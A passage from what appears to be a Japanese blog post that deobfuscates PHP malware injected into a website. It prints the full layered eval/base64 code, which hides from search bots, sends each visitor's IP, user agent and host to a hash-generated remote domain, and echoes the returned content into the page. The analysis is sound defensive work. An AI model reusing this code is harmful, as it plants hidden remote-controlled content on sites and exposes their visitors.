TsFmdl5CW6RkcY9ESnt0ZsFmdlRiLpISP4kHTigiRTJkZPl0ZhRFbPBFaO1EbhZXZukiI90zZPJCKGNlQm9USnFGVs9EUo5UTsFmdl5yVWFXYWJXaldFVsFmdlRCKuJETjdUSJ9UWxtWSC1URXxWY2VGI9ACajFETatGVCZFb1F3ZzN3csFmdlRCI7kCMwgDMxsSKoUWbpRHLpkiI90ESkhmUzMmIoY0UCZ2TJdWYUx2TQhmTNxWY2VGK1QWbsc1Ukd2QkVVWpV0UtFGbhZXZkgSZpt2bvNGdlNHQgsHIlNHblBSf7BSKpkSXXNFZnNEZVlVaFNVbhxWY2VGJbVUSL90TD9FJoQXZzNXaoAicvBSKpMkZjdWTwZXaz1kcsFmdlRCIsISavICIuASK0BFRo92cHRnbERHVsFmdlRCIsICfigSZk9Gbw1Wag4CIi8iIog2Y0FWbfdWZyBHKoYWa"(edoced_46esab(lave'));
	$evalUdCXTDQERmWnDS =18792;
}

 

コードをきれいに整形すると、上記のようになる。

「evallwhVfIVnWPbT」関数でやっているのは strrev と同じで文字列をひっくり返すだけ。それを評価、実行している。

一行ずつ関数にかけてみる。

//eval(evallwhVfIVnWPbT(';))"=ASf7kyaNRmbBRXWvNnRjFUWJxWY2VGJoUGZvNWZk9FN2U2chJGIuJXd0Vmc7BSKr1EZuFEdZ92cGNWQZlEbhZXZkgiRTJkZPl0ZhRFbPBFaO1EbhZXZg42bpR3YuVnZ"(edoced_46esab(lave'));
 eval(base64_decode("ZnVuY3Rpb24gZXZhbE1OaFBPbFRhZ0lPZkJTRigkZXZhbElZQWNGc29ZdEFuZE1rKSB7cmV0dXJuIGJhc2U2NF9kZWNvZGUoJGV2YWxJWUFjRnNvWXRBbmRNayk7fSA="));
//eval(evallwhVfIVnWPbT(';))"7kiI90ESkhmUzMmIoY0UCZ2TJdWYUx2TQhmTNxWY2VWPXNFZnNEZVlVaFNVbhxWY2VGJ"(edoced_46esab(lave'));
 eval(base64_decode("JGV2YWxhbVNFaVlVZENnZFNXPWV2YWxNTmhQT2xUYWdJT2ZCU0YoImMzUmhkSE09Iik7"));
//eval(evallwhVfIVnWPbT(';))"7kiI90TQjBjUIFmIoY0UCZ2TJdWYUx2TQhmTNxWY2VWPXZVchZlcpV2VUxWY2VGJ"(edoced_46esab(lave'));
 eval(base64_decode("JGV2YWxUV2VpclZhcVZXPWV2YWxNTmhQT2xUYWdJT2ZCU0YoImFIUjBjQT09Iik7"));
//eval(evallwhVfIVnWPbT(';))"7kiI9QzVhJCKGNlQm9USnFGVs9EUo5UTsFmdl1jQmhFRVdEdiVFZCxWY2VGJ"(edoced_46esab(lave'));
 eval(base64_decode("JGV2YWxCZFVidEdVRFhmQj1ldmFsTU5oUE9sVGFnSU9mQlNGKCJhVzQ9Iik7"));
//eval(evallwhVfIVnWPbT(';))"==wOpISP9EVS2R2VJJCKGNlQm9USnFGVs9EUo5UTsFmdl1TZVpnRuV2QsJ2dRxWY2VGJ"(edoced_46esab(lave'));
 eval(base64_decode("JGV2YWxRd2JsQ2VuRnpVZT1ldmFsTU5oUE9sVGFnSU9mQlNGKCJJV2R2SVE9PSIpOw=="));
//eval(evallwhVfIVnWPbT(';))"=sTXpISV1UlUIZEMYNlVwUlV5YUVVJlRTJCKGNlQm9USnFGVs9EUo5UTsFmdltlUFZlUFN1Xk0zQmN2ZNBndpNXTyxWY2VGJ"(edoced_46esab(lave'));
 eval(base64_decode("JGV2YWxyTXNpdnBNZ2NmQz0kX1NFUlZFUltldmFsTU5oUE9sVGFnSU9mQlNGKCJTRlJVVUY5VlUwVlNYMEZIUlU1VSIpXTs="));
//eval(evallwhVfIVnWPbT(';))"=sTKpkicqNlVjF0ahRGWZRXMhZXZkgidlJnc0NHKGNlQm9USnFGVs9EUo5UTsFmdlhCbhZXZ"(edoced_46esab(lave'));
 eval(base64_decode("ZXZhbChldmFsTU5oUE9sVGFnSU9mQlNGKHN0cnJldigkZXZhMXRZWGRha0FjVlNqcikpKTs="));
//eval(evallwhVfIVnWPbT(';))"=sTKpISP9c2YshXbZRnRtVlIoY0UCZ2TJdWYUx2TQhmTNxWY2VGIskiI0Y1RaVnRXdlIoY0UCZ2TJdWYUx2TQhmTNxWY2VGIskiI9kEWaJDbHFmaKhVWmZ0VhJCKGNlQm9USnFGVs9EUo5UTsFmdlBCLpICM50WUP5kVUJCKGNlQm9USnFGVs9EUo5UTsFmdlBCLpISPB52YxgnMVJCKGNlQm9USnFGVs9EUo5UTsFmdlBCLpICb4JjW2ljMSJCKGNlQm9USnFGVs9EUo5UTsFmdlhSehJnchBSPgQHUEh2bzdEduREdUxWY2VGJ"(edoced_46esab(lave'));
 eval(base64_decode("JGV2YWxUdERudEdzb2hEUHQgPSBhcnJheShldmFsTU5oUE9sVGFnSU9mQlNGKCJSMjl2WjJ4bCIpLCBldmFsTU5oUE9sVGFnSU9mQlNGKCJVMngxY25BPSIpLCBldmFsTU5oUE9sVGFnSU9mQlNGKCJUVk5PUW05MCIpLCBldmFsTU5oUE9sVGFnSU9mQlNGKCJhV0ZmWVhKamFHbDJaWEk9IiksIGV2YWxNTmhQT2xUYWdJT2ZCU0YoIldXRnVaR1Y0IiksIGV2YWxNTmhQT2xUYWdJT2ZCU0YoIlVtRnRZbXhsY2c9PSIpKTs="));
//eval(evallwhVfIVnWPbT(';))"==wOpkiI5QHVLpnUDtkeS5mYsJlbiZnTygFMWJjWmZ1RiBnWHF1Z002YxIFWalHdIlEcNhkSvRTbR1kTyIlSsBDVaZ0MhpkSVRlRkZkYopFWadGNyIGcSNTW1ZlbaJCKGNlQm9USnFGVs9EUo5UTsFmdlhCbhZXZ"(edoced_46esab(lave'));
 eval(base64_decode("ZXZhbChldmFsTU5oUE9sVGFnSU9mQlNGKCJablZ1WTNScGIyNGdaWFpoYkZkRlRVSkphM0ZaVDBsSlIyTk1RbTRvSkhNcElIdHlaWFIxY200Z1FHWnBiR1ZmWjJWMFgyTnZiblJsYm5SektDUnpLVHQ5IikpOw=="));
//eval(evallwhVfIVnWPbT(';))"==wOpgCMkRGJg0DIYpHRyh1TId2SnxWY2VGJ"(edoced_46esab(lave'));
 eval(base64_decode("JGV2YWxnS2dIT1hyRHpYID0gJGRkMCgpOw=="));
//eval(evallwhVfIVnWPbT(';))"==Qf9tDajFETatGVCZFb1F3ZzN3csFmdlRCIvh2YltTXxsFajFETatGVCZFb1F3ZzN3csFmdlRCI9ACajFETatGVCZFb1F3ZzN3csFmdlRCI7kCajFETatGVCZFb1F3ZzN3csFmdlRCLlVleG5WZDxmY3FFbhZXZkgSZk9GbwhXZg0DIoNWQMp1aUJkVsVXcnN3czxWY2VGJ7lSKlVleG5WZDxmY3FFbhZXZkwCajFETatGVCZFb1F3ZzN3csFmdlRCKyR3cyR3coAiZptTKp0VKiUlTxQVS5YUVVJlRTJCKGNlQm9USnFGVs9EUo5UTsFmdltlUFZlUFN1XkgSZk92YuVGbyVnLpISOn1mSigiRTJkZPl0ZhRFbPBFaO1EbhZXZukyQmN2ZNBndpNXTyxWY2VGJoUGZvNmblxmc15SKikTStpkIoY0UCZ2TJdWYUx2TQhmTNxWY2VmLdliI9kkRSVkRwglRSFDVOZ1aVJCKGNlQm9USnFGVs9EUo5UTsFmdltlUFZlUFN1Xk4SKi0DMUFmIoY0UCZ2TJdWYUx2TQhmTNxWY2VmLpISP4Q0YigiRTJkZPl0ZhRFbPBFaO1EbhZXZukiIvJkbMJCKGNlQm9USnFGVs9EUo5UTsFmdl5iQmhFRVdEdiVFZCxWY2VGJukiI90zdMJCKGNlQm9USnFGVs9EUo5UTsFmdl5CW6RkcY9ESnt0ZsFmdlRiLpISP4kHTigiRTJkZPl0ZhRFbPBFaO1EbhZXZukiI90zZPJCKGNlQm9USnFGVs9EUo5UTsFmdl5yVWFXYWJXaldFVsFmdlRCKuJETjdUSJ9UWxtWSC1URXxWY2VGI9ACajFETatGVCZFb1F3ZzN3csFmdlRCI7kCMwgDMxsSKoUWbpRHLpkiI90ESkhmUzMmIoY0UCZ2TJdWYUx2TQhmTNxWY2VGK1QWbsc1Ukd2QkVVWpV0UtFGbhZXZkgSZpt2bvNGdlNHQgsHIlNHblBSf7BSKpkSXXNFZnNEZVlVaFNVbhxWY2VGJbVUSL90TD9FJoQXZzNXaoAicvBSKpMkZjdWTwZXaz1kcsFmdlRCIsISavICIuASK0BFRo92cHRnbERHVsFmdlRCIsICfigSZk9Gbw1Wag4CIi8iIog2Y0FWbfdWZyBHKoYWa"(edoced_46esab(lave'));
 eval(base64_decode("aWYoKHByZWdfbWF0Y2goIi8iIC4gaW1wbG9kZSgifCIsICRldmFsVHREbnRHc29oRFB0KSAuICIvaSIsICRldmFsck1zaXZwTWdjZkMpKSBvciAoaXNzZXQoJF9DT09LSUVbJGV2YWxhbVNFaVlVZENnZFNXXSkpKSB7fSBlbHNlIHsgQHNldGNvb2tpZSgkZXZhbGFtU0VpWVVkQ2dkU1csbWQ1KGV2YWxNTmhQT2xUYWdJT2ZCU0YoImMzUmhkSE09IikpLHRpbWUoKSsxMDgwMCk7ICRldmFsc3NzZ3F1bFZCVGtaTEFjaCA9IGV2YWxXRU1CSWtxWU9JSUdjTEJuKCRldmFsVFdlaXJWYXFWVy5ldmFsTU5oUE9sVGFnSU9mQlNGKCJPZz09IikuZXZhbE1OaFBPbFRhZ0lPZkJTRigiTHk4PSIpLiRldmFsZ0tnSE9YckR6WC5ldmFsTU5oUE9sVGFnSU9mQlNGKCJMdz09IikuJGV2YWxCZFVidEdVRFhmQi5ldmFsTU5oUE9sVGFnSU9mQlNGKCJMbkJvIikuZXZhbE1OaFBPbFRhZ0lPZkJTRigiY0Q4PSIpLmV2YWxNTmhQT2xUYWdJT2ZCU0YoImFUMD0iKS4kX1NFUlZFUltldmFsTU5oUE9sVGFnSU9mQlNGKCJVa1ZOVDFSRlgwRkVSRkk9IildLmV2YWxNTmhQT2xUYWdJT2ZCU0YoIkptSTkiKS51cmxlbmNvZGUoJGV2YWxyTXNpdnBNZ2NmQykuZXZhbE1OaFBPbFRhZ0lPZkJTRigiSm1nOSIpLnVybGVuY29kZSgkX1NFUlZFUltldmFsTU5oUE9sVGFnSU9mQlNGKCJTRlJVVUY5SVQxTlUiKV0pKTtpZiAoc3Ryc3RyKCRldmFsc3NzZ3F1bFZCVGtaTEFjaCwkZXZhbFF3YmxDZW5GelVlKSl7JGV2YWxzc3NncXVsVkJUa1pMQWNoID0gZXhwbG9kZSgkZXZhbFF3YmxDZW5GelVlLCRldmFsc3NzZ3F1bFZCVGtaTEFjaCk7ICRldmFsc3NzZ3F1bFZCVGtaTEFjaCA9ICRldmFsc3NzZ3F1bFZCVGtaTEFjaFsxXTtlY2hvICRldmFsc3NzZ3F1bFZCVGtaTEFjaDt9fQ=="));

これらのbase64をデコードすると

function evalMNhPOlTagIOfBSF($evalIYAcFsoYtAndMk) {return base64_decode($evalIYAcFsoYtAndMk);}
 $evalamSEiYUdCgdSW=evalMNhPOlTagIOfBSF("c3RhdHM=");
 $evalTWeirVaqVW=evalMNhPOlTagIOfBSF("aHR0cA==");
 $evalBdUbtGUDXfB=evalMNhPOlTagIOfBSF("aW4=");
 $evalQwblCenFzUe=evalMNhPOlTagIOfBSF("IWdvIQ==");
 $evalrMsivpMgcfC=$_SERVER[evalMNhPOlTagIOfBSF("SFRUUF9VU0VSX0FHRU5U")];
 eval(evalMNhPOlTagIOfBSF(strrev($eva1tYXdakAcVSjr)));
 $evalTtDntGsohDPt = array(evalMNhPOlTagIOfBSF("R29vZ2xl"), evalMNhPOlTagIOfBSF("U2x1cnA="), evalMNhPOlTagIOfBSF("TVNOQm90"), evalMNhPOlTagIOfBSF("aWFfYXJjaGl2ZXI="), evalMNhPOlTagIOfBSF("WWFuZGV4"), evalMNhPOlTagIOfBSF("UmFtYmxlcg=="));
 eval(evalMNhPOlTagIOfBSF("ZnVuY3Rpb24gZXZhbFdFTUJJa3FZT0lJR2NMQm4oJHMpIHtyZXR1cm4gQGZpbGVfZ2V0X2NvbnRlbnRzKCRzKTt9"));
 $evalgKgHOXrDzX = $dd0();
 if((preg_match("/" . implode("|", $evalTtDntGsohDPt) . "/i", $evalrMsivpMgcfC)) or (isset($_COOKIE[$evalamSEiYUdCgdSW]))) {} else { @setcookie($evalamSEiYUdCgdSW,md5(evalMNhPOlTagIOfBSF("c3RhdHM=")),time()+10800); $evalsssgqulVBTkZLAch = evalWEMBIkqYOIIGcLBn($evalTWeirVaqVW.evalMNhPOlTagIOfBSF("Og==").evalMNhPOlTagIOfBSF("Ly8=").$evalgKgHOXrDzX.evalMNhPOlTagIOfBSF("Lw==").$evalBdUbtGUDXfB.evalMNhPOlTagIOfBSF("LnBo").evalMNhPOlTagIOfBSF("cD8=").evalMNhPOlTagIOfBSF("aT0=").$_SERVER[evalMNhPOlTagIOfBSF("UkVNT1RFX0FERFI=")].evalMNhPOlTagIOfBSF("JmI9").urlencode($evalrMsivpMgcfC).evalMNhPOlTagIOfBSF("Jmg9").urlencode($_SERVER[evalMNhPOlTagIOfBSF("SFRUUF9IT1NU")]));if (strstr($evalsssgqulVBTkZLAch,$evalQwblCenFzUe)){$evalsssgqulVBTkZLAch = explode($evalQwblCenFzUe,$evalsssgqulVBTkZLAch); $evalsssgqulVBTkZLAch = $evalsssgqulVBTkZLAch[1];echo $evalsssgqulVBTkZLAch;}}

 

これが返ってくるので、整形する。

function evalMNhPOlTagIOfBSF($evalIYAcFsoYtAndMk) {
	return base64_decode($evalIYAcFsoYtAndMk);
}

$evalamSEiYUdCgdSW=evalMNhPOlTagIOfBSF("c3RhdHM=");
$evalTWeirVaqVW=evalMNhPOlTagIOfBSF("aHR0cA==");
$evalBdUbtGUDXfB=evalMNhPOlTagIOfBSF("aW4=");
$evalQwblCenFzUe=evalMNhPOlTagIOfBSF("IWdvIQ==");
$evalrMsivpMgcfC=$_SERVER[evalMNhPOlTagIOfBSF("SFRUUF9VU0VSX0FHRU5U")];
eval(evalMNhPOlTagIOfBSF(strrev($eva1tYXdakAcVSjr)));
$evalTtDntGsohDPt = array(
	evalMNhPOlTagIOfBSF("R29vZ2xl"),
	evalMNhPOlTagIOfBSF("U2x1cnA="),
	evalMNhPOlTagIOfBSF("TVNOQm90"),
	evalMNhPOlTagIOfBSF("aWFfYXJjaGl2ZXI="),
	evalMNhPOlTagIOfBSF("WWFuZGV4"),
	evalMNhPOlTagIOfBSF("UmFtYmxlcg==")
);
eval(evalMNhPOlTagIOfBSF("ZnVuY3Rpb24gZXZhbFdFTUJJa3FZT0lJR2NMQm4oJHMpIHtyZXR1cm4gQGZpbGVfZ2V0X2NvbnRlbnRzKCRzKTt9"));
$evalgKgHOXrDzX = $dd0();
if( (preg_match("/" . implode("|", $evalTtDntGsohDPt) . "/i", $evalrMsivpMgcfC)) or (isset($_COOKIE[$evalamSEiYUdCgdSW]))) {

} else {
	@setcookie($evalamSEiYUdCgdSW,md5(evalMNhPOlTagIOfBSF("c3RhdHM=")),time()+10800);
	$evalsssgqulVBTkZLAch = evalWEMBIkqYOIIGcLBn($evalTWeirVaqVW.evalMNhPOlTagIOfBSF("Og==").evalMNhPOlTagIOfBSF("Ly8=").$evalgKgHOXrDzX.evalMNhPOlTagIOfBSF("Lw==").$evalBdUbtGUDXfB.evalMNhPOlTagIOfBSF("LnBo").evalMNhPOlTagIOfBSF("cD8=").evalMNhPOlTagIOfBSF("aT0=").$_SERVER[evalMNhPOlTagIOfBSF("UkVNT1RFX0FERFI=")].evalMNhPOlTagIOfBSF("JmI9").urlencode($evalrMsivpMgcfC).evalMNhPOlTagIOfBSF("Jmg9").urlencode($_SERVER[evalMNhPOlTagIOfBSF("SFRUUF9IT1NU")]));
	if ( strstr($evalsssgqulVBTkZLAch,$evalQwblCenFzUe)){
		$evalsssgqulVBTkZLAch = explode($evalQwblCenFzUe,$evalsssgqulVBTkZLAch);
		$evalsssgqulVBTkZLAch = $evalsssgqulVBTkZLAch[1];
		echo $evalsssgqulVBTkZLAch;
	}
}

整形したものを解析する。

$evalamSEiYUdCgdSW=evalMNhPOlTagIOfBSF("c3RhdHM=");

base64デコードすると「stats」が出てくる。

$evalTWeirVaqVW=evalMNhPOlTagIOfBSF("aHR0cA==");

デコードで「http」がでてくる。

$evalBdUbtGUDXfB=evalMNhPOlTagIOfBSF("aW4=");

デコードで「in」がでてくる。

$evalQwblCenFzUe=evalMNhPOlTagIOfBSF("IWdvIQ==");

デコードで「!go!」がでてくる。

$evalrMsivpMgcfC=$_SERVER[evalMNhPOlTagIOfBSF("SFRUUF9VU0VSX0FHRU5U")];

デコードで「HTTP_USER_AGENT」がでてくる。つまり、

$evalrMsivpMgcfC = $_SERVER["HTTP_USER_AGENT"];

ということ。

eval(evalMNhPOlTagIOfBSF(strrev($eva1tYXdakAcVSjr)));

さきほどオトリだと思っていた、配列の[0]がココで出てくる。strrevなのでひっくり返してbase64デコードをかけると、

$fri55 = ';$retarn($fif25,$fif52,$fit52';$fr55 = '$retrun(';$fr52 = 'MKU}f6T4';$fri52 = '\x3d\42\x29\51\x3b';$fri25 = '\112\x48\112\x6c\144\x48'; $fr25 = $fri52.'")'.$fri55; $dri25 = "\x24\144\x64\60\x20\75\x20";eval('$fif25 = "\x40\50\x2e\53\x29\100\x69\145";$fif52 = "\x65\166\x61\154\x28\42\x5c\61\x22\51\x3b";$fit52 = "\x40\145\x76\141\x6c\50\x62\141\x73\145\x36\64\x5f\144\x65\143\x6f\144\x65\50\x22";preg_replace($fif25,$fif52,$fit52."\112\x48\112\x6c\144\x47\106\x79\142\x6a\60\x6e\143\x48\112\x6c\132\x31\71\x79\132\x58\102\x73\131\x57\116\x6c\112\x7a\163'.$fr25.'."'.$fri25.'\126\x75\120\x53\144\x6a\143\x6d\126\x68\144\x47\126\x66\132\x6e\126\x75\131\x33\122\x70\142\x32\64\x6e\117\x77\75'.$fr25.'."'.$fri25.'\112\x31\142\x6a\60\x6e\143\x6d\126\x30\143\x6e\126\x75\112\x7a\163'.$fr25.'."\132\x6e\126\x75\131\x33\122\x70\142\x32\64\x67\143\x6d\126\x30\143\x6e\126\x75\113\x43\122\x79\132\x58\122\x31\143\x6d\64\x70\111\x48\163\x6b\132\x6e\126\x75\131\x32\154\x30\142\x32\64\x67\120\x53\102\x6a\143\x6d\126\x68\144\x47\126\x66\132\x6e\126\x75\131\x33\122\x70\142\x32\64\x6f\111\x69\131\x6b\111\x69\64\x69\132\x6e\126\x75\131\x33\122\x70\142\x32\64\x69\114\x43\111\x6b\111\x69\64\x69\132\x6e\126\x75\131\x33\122\x70\142\x32\64\x67\120\x53\102\x6a\141\x48\111\x6f\142\x33\112\x6b\113\x43\121\x69\114\x69\112\x6d\144\x57\65\x6a\144\x47\154\x76\142\x69\153\x74\115\x79\153\x37\111\x69\153\x37'.$fri25.'\126\x79\142\x69\101\x39\111\x48\116\x30\143\x6c\71\x7a\143\x47\170\x70\144\x43\147\x6b\143\x6d\126\x30\144\x58\112\x75\113\x54\164\x68\143\x6e\112\x68\145\x56\71\x33\131\x57\170\x72\113\x43\122\x79\132\x58\122\x31\143\x6d\64\x73\111\x43\122\x6d\144\x57\65\x6a\141\x58\122\x76\142\x69\153\x37\143\x6d\126\x30\144\x58\112\x75\111\x47\112\x68\143\x32\125\x32\116\x46\71\x6b\132\x57\116\x76\132\x47\125\x6f\141\x57\61\x77\142\x47\71\x6b\132\x53\147\x69\111\x69\167\x6b\143\x6d\126\x30\144\x58\112\x75\113\x53\153\x37\146\x51\75'.$fri52.'");$psi1='.$fr55.'"'.$fr52.'PlD<LJQ|]ZI3]Y<pgZ8mgJoyeljqMKMogKY|elfvM6MogKY|elDlg5YlOVLxf6Ylf6U|NFU|][U4fp7vPFz}NWvqNWv@").'.$fr55."'".''.$fr52.'LG3j\6Mo\[Uo[5]4epQ3dZ<xNFfnfpY3g[MxM|zqfpY3g[MxLJ4nQVjnfpY3g[MxNWvqNWv@'."'".').'.$fr55."'".$fr52.'PVD<LJQ|]ZI3]Y<pgZ8mgJoyeljqM|zqfpY3g[MxLJ43[6MkepTrPV3{OGHuPVn:M|n:'."'".').'.$fr55."'".$fr52.'PWLjSVEmfpYkgJYi]qYx\6Use57rM|UmfpYkgJYi]qYx\6Use57qOFg|][U4fp7j]5Y3dJ<}gJM8epIw]Vjn\6Mo\[Uo[5]4epQ3dZ<xOlLx\|LxLpHlNWvqNWv@'."'".');'.$dri25.'$retun("",$psi1.'.$fr55.'"fpY3g[MxLFU3f6Q3QVjngKQ}gGX{PljngKQ}gGX|NFU3f6Q3QVjngKQ}gGX{NFnsNVnsOlL@").'.$fr55.'"OpQyeVL:"));');

というコードが。これを整形すると

$fri55 = ';$retarn($fif25,$fif52,$fit52';
$fr55 = '$retrun(';
$fr52 = 'MKU}f6T4';
$fri52 = '\x3d\42\x29\51\x3b';
$fri25 = '\112\x48\112\x6c\144\x48';
$fr25 = $fri52.'")'.$fri55;
$dri25 = "\x24\144\x64\60\x20\75\x20";
eval('$fif25 = "\x40\50\x2e\53\x29\100\x69\145";
$fif52 = "\x65\166\x61\154\x28\42\x5c\61\x22\51\x3b";
$fit52 = "\x40\145\x76\141\x6c\50\x62\141\x73\145\x36\64\x5f\144\x65\143\x6f\144\x65\50\x22";
preg_replace($fif25,$fif52,$fit52."\112\x48\112\x6c\144\x47\106\x79\142\x6a\60\x6e\143\x48\112\x6c\132\x31\71\x79\132\x58\102\x73\131\x57\116\x6c\112\x7a\163'.$fr25.'."'.$fri25.'\126\x75\120\x53\144\x6a\143\x6d\126\x68\144\x47\126\x66\132\x6e\126\x75\131\x33\122\x70\142\x32\64\x6e\117\x77\75'.$fr25.'."'.$fri25.'\112\x31\142\x6a\60\x6e\143\x6d\126\x30\143\x6e\126\x75\112\x7a\163'.$fr25.'."\132\x6e\126\x75\131\x33\122\x70\142\x32\64\x67\143\x6d\126\x30\143\x6e\126\x75\113\x43\122\x79\132\x58\122\x31\143\x6d\64\x70\111\x48\163\x6b\132\x6e\126\x75\131\x32\154\x30\142\x32\64\x67\120\x53\102\x6a\143\x6d\126\x68\144\x47\126\x66\132\x6e\126\x75\131\x33\122\x70\142\x32\64\x6f\111\x69\131\x6b\111\x69\64\x69\132\x6e\126\x75\131\x33\122\x70\142\x32\64\x69\114\x43\111\x6b\111\x69\64\x69\132\x6e\126\x75\131\x33\122\x70\142\x32\64\x67\120\x53\102\x6a\141\x48\111\x6f\142\x33\112\x6b\113\x43\121\x69\114\x69\112\x6d\144\x57\65\x6a\144\x47\154\x76\142\x69\153\x74\115\x79\153\x37\111\x69\153\x37'.$fri25.'\126\x79\142\x69\101\x39\111\x48\116\x30\143\x6c\71\x7a\143\x47\170\x70\144\x43\147\x6b\143\x6d\126\x30\144\x58\112\x75\113\x54\164\x68\143\x6e\112\x68\145\x56\71\x33\131\x57\170\x72\113\x43\122\x79\132\x58\122\x31\143\x6d\64\x73\111\x43\122\x6d\144\x57\65\x6a\141\x58\122\x76\142\x69\153\x37\143\x6d\126\x30\144\x58\112\x75\111\x47\112\x68\143\x32\125\x32\116\x46\71\x6b\132\x57\116\x76\132\x47\125\x6f\141\x57\61\x77\142\x47\71\x6b\132\x53\147\x69\111\x69\167\x6b\143\x6d\126\x30\144\x58\112\x75\113\x53\153\x37\146\x51\75'.$fri52.'");
$psi1='.$fr55.'"'.$fr52.'PlD<LJQ|]ZI3]Y<pgZ8mgJoyeljqMKMogKY|elfvM6MogKY|elDlg5YlOVLxf6Ylf6U|NFU|][U4fp7vPFz}NWvqNWv@").'.$fr55."'".''.$fr52.'LG3j\6Mo\[Uo[5]4epQ3dZ<xNFfnfpY3g[MxM|zqfpY3g[MxLJ4nQVjnfpY3g[MxNWvqNWv@'."'".').'.$fr55."'".$fr52.'PVD<LJQ|]ZI3]Y<pgZ8mgJoyeljqM|zqfpY3g[MxLJ43[6MkepTrPV3{OGHuPVn:M|n:'."'".').'.$fr55."'".$fr52.'PWLjSVEmfpYkgJYi]qYx\6Use57rM|UmfpYkgJYi]qYx\6Use57qOFg|][U4fp7j]5Y3dJ<}gJM8epIw]Vjn\6Mo\[Uo[5]4epQ3dZ<xOlLx\|LxLpHlNWvqNWv@'."'".');'.$dri25.'$retun("",$psi1.'.$fr55.'"fpY3g[MxLFU3f6Q3QVjngKQ}gGX{PljngKQ}gGX|NFU3f6Q3QVjngKQ}gGX{NFnsNVnsOlL@").'.$fr55.'"OpQyeVL:"));');

上記のようなコードになるので、コレを実行すると

$dd0 =
$fif25 = "\x40\50\x2e\53\x29\100\x69\145";
$fif52 = "\x65\166\x61\154\x28\42\x5c\61\x22\51\x3b";
$fit52 = "\x40\145\x76\141\x6c\50\x62\141\x73\145\x36\64\x5f\144\x65\143\x6f\144\x65\50\x22";
preg_replace($fif25,$fif52,$fit52."\112\x48\112\x6c\144\x47\106\x79\142\x6a\60\x6e\143\x48\112\x6c\132\x31\71\x79\132\x58\102\x73\131\x57\116\x6c\112\x7a\163\x3d\42\x29\51\x3b");$retarn($fif25,$fif52,$fit52."\112\x48\112\x6c\144\x48\126\x75\120\x53\144\x6a\143\x6d\126\x68\144\x47\126\x66\132\x6e\126\x75\131\x33\122\x70\142\x32\64\x6e\117\x77\75\x3d\42\x29\51\x3b");$retarn($fif25,$fif52,$fit52."\112\x48\112\x6c\144\x48\112\x31\142\x6a\60\x6e\143\x6d\126\x30\143\x6e\126\x75\112\x7a\163\x3d\42\x29\51\x3b");$retarn($fif25,$fif52,$fit52."\132\x6e\126\x75\131\x33\122\x70\142\x32\64\x67\143\x6d\126\x30\143\x6e\126\x75\113\x43\122\x79\132\x58\122\x31\143\x6d\64\x70\111\x48\163\x6b\132\x6e\126\x75\131\x32\154\x30\142\x32\64\x67\120\x53\102\x6a\143\x6d\126\x68\144\x47\126\x66\132\x6e\126\x75\131\x33\122\x70\142\x32\64\x6f\111\x69\131\x6b\111\x69\64\x69\132\x6e\126\x75\131\x33\122\x70\142\x32\64\x69\114\x43\111\x6b\111\x69\64\x69\132\x6e\126\x75\131\x33\122\x70\142\x32\64\x67\120\x53\102\x6a\141\x48\111\x6f\142\x33\112\x6b\113\x43\121\x69\114\x69\112\x6d\144\x57\65\x6a\144\x47\154\x76\142\x69\153\x74\115\x79\153\x37\111\x69\153\x37\112\x48\112\x6c\144\x48\126\x79\142\x69\101\x39\111\x48\116\x30\143\x6c\71\x7a\143\x47\170\x70\144\x43\147\x6b\143\x6d\126\x30\144\x58\112\x75\113\x54\164\x68\143\x6e\112\x68\145\x56\71\x33\131\x57\170\x72\113\x43\122\x79\132\x58\122\x31\143\x6d\64\x73\111\x43\122\x6d\144\x57\65\x6a\141\x58\122\x76\142\x69\153\x37\143\x6d\126\x30\144\x58\112\x75\111\x47\112\x68\143\x32\125\x32\116\x46\71\x6b\132\x57\116\x76\132\x47\125\x6f\141\x57\61\x77\142\x47\71\x6b\132\x53\147\x69\111\x69\167\x6b\143\x6d\126\x30\144\x58\112\x75\113\x53\153\x37\146\x51\75\x3d\42\x29\51\x3b");
$psi1=$retrun("MKU}f6T4PlD<LJQ|]ZI3]Y<pgZ8mgJoyeljqMKMogKY|elfvM6MogKY|elDlg5YlOVLxf6Ylf6U|NFU|][U4fp7vPFz}NWvqNWv@").$retrun('MKU}f6T4LG3j\6Mo\[Uo[5]4epQ3dZ<xNFfnfpY3g[MxM|zqfpY3g[MxLJ4nQVjnfpY3g[MxNWvqNWv@').$retrun('MKU}f6T4PVD<LJQ|]ZI3]Y<pgZ8mgJoyeljqM|zqfpY3g[MxLJ43[6MkepTrPV3{OGHuPVn:M|n:').$retrun('MKU}f6T4PWLjSVEmfpYkgJYi]qYx\6Use57rM|UmfpYkgJYi]qYx\6Use57qOFg|][U4fp7j]5Y3dJ<}gJM8epIw]Vjn\6Mo\[Uo[5]4epQ3dZ<xOlLx\|LxLpHlNWvqNWv@');$dd0 = $retun("",$psi1.$retrun("fpY3g[MxLFU3f6Q3QVjngKQ}gGX{PljngKQ}gGX|NFU3f6Q3QVjngKQ}gGX{NFnsNVnsOlL@").$retrun("OpQyeVL:"));

というものが出てくる。 $dd0 全体がまたコードになっている。

$psi1 の中身は

$tsst52 = create_function('$return','return "web-".substr($return,0,3);');$tsst5 = create_function('$return','return md5($return);');$tsst51 = create_function('','return mt_rand(1-1,1+1);');$tsst512 = create_function('$create_function','return gethostbyname($create_function.".c"."a");');

というコードが返ってくる。

この上の部分で無名関数を作っている。

これで

$dd0() = "f528764d624db129b32c21fbca0cb8d6.com";

ということがわかった。
整形すると

$tsst52 = create_function('$return','return "web-".substr($return,0,3);');
$tsst5 = create_function('$return','return md5($return);');
$tsst51 = create_function('','return mt_rand(1-1,1+1);');
$tsst512 = create_function('$create_function','return gethostbyname($create_function.".c"."a");');

となる。

 

$evalTtDntGsohDPt = array(
 evalMNhPOlTagIOfBSF("R29vZ2xl"),
 evalMNhPOlTagIOfBSF("U2x1cnA="),
 evalMNhPOlTagIOfBSF("TVNOQm90"),
 evalMNhPOlTagIOfBSF("aWFfYXJjaGl2ZXI="),
 evalMNhPOlTagIOfBSF("WWFuZGV4"),
 evalMNhPOlTagIOfBSF("UmFtYmxlcg==")
);

この配列を解析すると、

array(
 'Google',
 'Slurp',
 'MSNBot',
 'ia_archiver',
 'Yandex',
 'Rambler'
);

という配列が見えてくる。見ての通りこれは検索ボットのリスト。
この時点で、ユーザエージェントが検索ボットの場合には攻撃コードを返さないようにするのが推定できる。

 

eval(evalMNhPOlTagIOfBSF("ZnVuY3Rpb24gZXZhbFdFTUJJa3FZT0lJR2NMQm4oJHMpIHtyZXR1cm4gQGZpbGVfZ2V0X2NvbnRlbnRzKCRzKTt9"));

これを変換すると

